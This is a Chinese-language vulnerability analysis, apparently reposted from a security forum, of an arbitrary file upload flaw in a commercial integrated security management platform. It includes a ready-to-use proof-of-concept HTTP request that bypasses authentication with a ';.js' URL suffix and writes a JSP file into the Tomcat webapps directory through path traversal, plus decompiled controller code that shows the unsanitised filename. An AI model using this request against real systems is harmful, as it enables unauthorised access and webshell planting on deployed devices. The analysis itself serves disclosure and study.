某综合安防系统-任意文件上传漏洞分析

ivi

0x00 简介

综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、配置、管理和调度

0x01 漏洞概述

该产品存在任意文件上传历史漏洞

0x02 影响版本

历史版本

0x03 漏洞复现

先上Poc

1. POST /center/api/files;.js HTTP/1.1
   
2. User-Agent: PostmanRuntime/7.29.2
   
3. Accept: */*
   
4. Postman-Token: 1ac225cc-bdbe-4176-b806-a9a7c796ee33
   
5. Host: xxxxxxxxxxxxxx
   
6. Connection: close
   
7. Content-Type: multipart/form-data; boundary=--------------------------180188939909122941133151
   
8. Cookie: JSESSIONID=A0A01DAF36544051C724ABCCB20A0EA6
   
9. Content-Length: 286
   
10. 
    
11. ----------------------------180188939909122941133151
    
12. Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/hello.jsp"
    
13. Content-Type: application/octet-stream
    
14. 
    
15. hello
    
16. ----------------------------180188939909122941133151--

复制代码

0x04 漏洞分析

CAS配置文件如下：/bin/tomcat/apache-tomcat/webapps/center/WEB-INF/classes/cas-client.properties，对.eot,.woff,.ttf,.svg,.gif,.css,.js,.json等文件不进行鉴权

1. cas.ignore.pattern=/,*.html,/login,*.eot,*.woff,*.ttf,*.svg,*.gif,*.css,*.js,*.json,/casLogin,*.ico,*.icon,*.png,*.map,/api/meta/qrcode,/api/session,/api/session/captcha,/api/locales,/api/meta,/api/menus,/api/users/*/password,/api/fileUpload/*,/center/api/fileUpload/*,/api/clientInstall/LatestVersion,/api/clientResourceInstall/LatestVersion,/center/api/clientInstall/LatestVersion,/center/api/clientResourceInstall/LatestVersion,/api/machines/*/steps,/api/verifyCodeImage,/api/encryptParam,/api/webLogin,/api/modifyPassword,/api/negotiation,/api/webMachines,/api/webDelMachines,/api/webAlerts,/api/webResources,/api/webMenus,/api/settings/firewalls/*,/api/installMachineList/*,/api/clientInstall/*,/api/task/*,/api/bic/*,/api/installation/*,/api/external/*,/api/logsOnline/*

复制代码

文件上传函数，没有对filename进行过滤
/bin/tomcat/apache-tomcat/webapps/center/WEB-INF/classes/com/hikvision/center/module/faq/controller/KnowledgeController.class

1. @RequestMapping(
   
2.     value = {"/files"},
   
3.     method = {RequestMethod.POST}
   
4. )
   
5. public Object uploadFile(@RequestParam(value = "file",required = false) MultipartFile file, HttpServletResponse response, @RequestParam(value = "upload",required = false) MultipartFile upload, HttpServletRequest request) throws IOException {
   
6.     if (request.getCharacterEncoding() == null) {
   
7.         request.setCharacterEncoding("UTF-8");
   
8.     }
   
9. 
   
10.     String CKEditor = request.getParameter("CKEditor");
    
11.     ResultData responseBean = new ResultData();
    
12.     String result;
    
13.     if (file == null) {
    
14.         if (upload == null) {
    
15.             if (StringUtils.isBlank(CKEditor)) {
    
16.                 responseBean.setCode("0x0011775d");
    
17.                 responseBean.setMsg(LocaleTextUtil.getErrorText(responseBean.getCode()));
    
18.                 return responseBean;
    
19.             }
    
20. 
    
21.             result = "<script type="text/javascript">window.parent.CKEDITOR.tools.callFunction('0', '/download1/xxx', '?');</script>";
    
22.             String languageType = LocaleTextUtil.getLocalLanguage();
    
23.             if ("zh_CN".equals(languageType)) {
    
24.                 result = new String(result.replace("?", "请选择文件").getBytes("UTF-8"), "ISO-8859-1");
    
25.             } else {
    
26.                 result = new String(result.replace("?", "choose file please").getBytes("UTF-8"), "ISO-8859-1");
    
27.             }
    
28. 
    
29.             response.getOutputStream().print(result);
    
30.             return null;
    
31.         }
    
32. 
    
33.         file = upload;
    
34.     }
    
35. 
    
36.     result = null;
    
37.     User user = BusLogUtil.getUser();
    
38.     if (user != null) {
    
39.         result = user.getUserId();
    
40.     }
    
41. 
    
42.     String filename = file.getOriginalFilename();
    
43.     this.logger.debug(HikLog.toLog(HikLog.message("uploadFile", new String[]{"username", "filename", "CKEditor"})), new Object[]{result, filename, CKEditor});
    
44.     JSONObject json = null;
    
45. 
    
46.     try {
    
47.         json = this.knowledgeService.uploadFile(file);
    
48.         this.operationRecordService.sendLogToCenter("uploadFile", true, "file", "", filename, "", "", "knowledgeBase", "", 0, "", "");
    
49.         if (StringUtils.isBlank(CKEditor)) {
    
50.             responseBean.setCode("0");
    
51.             responseBean.setMsg((String)null);
    
52.             responseBean.setData(json);
    
53.             return responseBean;
    
54.         } else {
    
55.             String result = "<script type="text/javascript">window.parent.CKEDITOR.tools.callFunction('0', '?', '');</script>";
    
56.             result = result.replace("?", new String(json.getString("link").getBytes("UTF-8"), "ISO-8859-1"));
    
57.             response.setContentType("text/html;charset=utf-8");
    
58.             response.getOutputStream().print(result);
    
59.             return null;
    
60.         }
    
61.     } catch (Exception var14) {
    
62.         String code = "";
    
63.         if (var14 instanceof ProgramException) {
    
64.             code = ((ProgramException)var14).getCode();
    
65.                      } else {
    
66.                      code = "0x00137759";
    
67.                      }
    
68. 
    
69.                      this.logger.error(HikLog.toLog(HikLog.message("upload file error", new String[]{"errorCode", "error"})), code, var14);
    
70.                      this.operationRecordService.sendLogToCenter("uploadFile", false, "file", "", filename, "", "", "knowledgeBase", "", 1, "", code);
    
71.                      if (StringUtils.isBlank(CKEditor)) {
    
72.                      responseBean.setCode("0x00137759");
    
73.                      responseBean.setMsg(LocaleTextUtil.getErrorText(responseBean.getCode()));
    
74.                      responseBean.setData(json);
    
75.                      return responseBean;
    
76.                      } else {
    
77.                      String result = "<script type="text/javascript">window.parent.CKEDITOR.tools.callFunction('0', '/download1/xxx', '?');</script>";
    
78.                      result = result.replace("?", LocaleTextUtil.getErrorText("0x00137759"));
    
79.                      response.getOutputStream().print(result);
    
80.                      return null;
    
81.                      }
    
82.                      }
    
83.                      }

复制代码

KnowledgeServiceImpl#uploadFile，直接拼接文件名filename

1. public JSONObject uploadFile(MultipartFile file) {
   
2.         String uuid = UUID.randomUUID().toString();
   
3.         String filename = null;
   
4. 
   
5.         try {
   
6.             filename = new String(file.getOriginalFilename().getBytes(System.getProperty("sun.jnu.encoding")), "UTF-8");
   
7.         } catch (UnsupportedEncodingException var9) {
   
8.             filename = file.getOriginalFilename();
   
9.         }
   
10. 
    
11.         String resourcePath = AddressUtil.getResourcePath() + File.separator + "resource" + File.separator + uuid;
    
12.         File resourceFile = new File(resourcePath);
    
13.         if (!resourceFile.exists()) {
    
14.             resourceFile.mkdirs();
    
15.         }
    
16. 
    
17.         JSONObject json = new JSONObject();
    
18. 
    
19.         try {
    
20.             file.transferTo(new File(resourcePath + File.separator + filename));
    
21.         } catch (Exception var8) {
    
22.             this.logger.error(HikLog.toLog(HikLog.message("upload file fail", new String[]{"e"})), var8);
    
23.             throw new ProgramException("0x00137759");
    
24.         }
    
25. 
    
26.         json.put("id", uuid);
    
27.         json.put("filename", filename);
    
28.         String link = AddressUtil.getFAQResourceUrl() + "/resource/" + uuid + "/" + filename;
    
29.         link = link.replace("\", "/");
    
30.         json.put("link", link);
    
31.         return json;

复制代码

我们知道，Spring 在处理url时，removeSemicolonContentInternal方法，主要的功能是

• 移除所有的分号
  
• 移除分号后面直到下一个斜杠”/”之间的所有字符
  

拼接的/center/api/files;.js可以绕过鉴权，同时经过removeSemicolonContentInternal方法 ==》得到/center/api/files，分发到正确的路由，导致文件上传

0x05 修复方式

联系官方打补丁

来源：https://xz.aliyun.com/ 感谢【KimJun】